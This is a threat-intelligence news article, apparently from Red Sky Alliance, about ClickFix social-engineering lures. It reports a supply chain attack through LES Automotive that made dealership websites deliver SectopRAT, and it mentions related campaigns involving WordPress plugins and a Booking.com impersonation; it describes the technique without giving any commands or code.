Recently, over 100 websites belonging to car dealerships were found to serve malicious "ClickFix" code due to a supply chain attack that affected a third-party domain. According to security researcher Randy McEoin, the threat actor infected LES Automotive, a privately held streaming service provider based in Tolland, CT, that primarily focuses on the automotive industry. All websites using LES Automotive's services shared a ClickFix webpage with their visitors. [1]
See: https://redskyalliance.org/xindustry/booking-com-and-clickfix
This is the second major supply chain attack that has affected large numbers of dealerships in less than a year. Still, this time, the attack involved banks using malicious code displayed on a webpage, prompting the user to fix the error or perform a reCAPTCHA challenge to prove they are human. Once clicking on the prompt, a malicious command is automatically copied to the user's clipboard; they are instructed to open the Windows Run prompt and paste the copied command into the prompt to execute it. After that, the attacker can access the target and execute a second-stage payload, which, in this case, is the SectopRAT malware.
This is not the first time this technique has been used, and likely not the last. In October 2024, GoDaddy, a domain registrar, warned of a variant of malware disguised as a fake browser update called ClickFix that infected over 6,000 WordPress sites in just one day. "These seemingly legitimate plug-ins are designed to appear harmless to website administrators but contain embedded malicious scripts that deliver fake browser update prompts to end users," GoDaddy principal security engineer Denis Sinegubko said at the time.
More recently, on 13 March 2025, Microsoft warned of Storm-1865, a threat actor using ClickFix in attacks primarily targeting the hospitality industry in North America, Oceania, South and Southeast Asia, and all across Europe. Part of the threat actor's campaign involved impersonating Booking.com, sending a malicious email to the user pretending to be the travel agency company, and encouraging them to review their account, a request, or to offer a promotion. This was just a front, and the attack chain ultimately led to a malicious payload being downloaded.
This article is shared at no charge and is for educational and informational purposes only.
Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. We provide indicators of compromise information via a notification service (RedXray) or an analysis service (CTAC). For questions, comments, or assistance, please get in touch with the office directly at 1-844-492-7225 or feedback@redskyalliance.com
• Reporting: https://www.redskyalliance.org/
• Website: https://www.redskyalliance.com/
• LinkedIn: https://www.linkedin.com/company/64265941
Weekly Cyber Intelligence Briefings:
REDSHORTS - Weekly Cyber Intelligence Briefings
https://register.gotowebinar.com/register/5207428251321676122
© 2025 Red Sky Alliance Corporation. All rights reserved.
Comments